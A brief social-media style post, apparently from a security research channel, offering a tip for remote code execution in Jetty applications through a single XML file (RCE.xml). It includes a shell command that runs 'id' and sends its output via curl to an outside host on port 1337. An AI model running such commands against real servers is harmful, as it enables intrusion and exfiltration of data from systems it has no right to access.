A tip for getting RCE in Jetty apps with just one XML file! upd: RCE.xml /bin/sh -c curl -F "r=`id`" http://PTSWARM.local:1337/ 2.7K viewsedited 13:33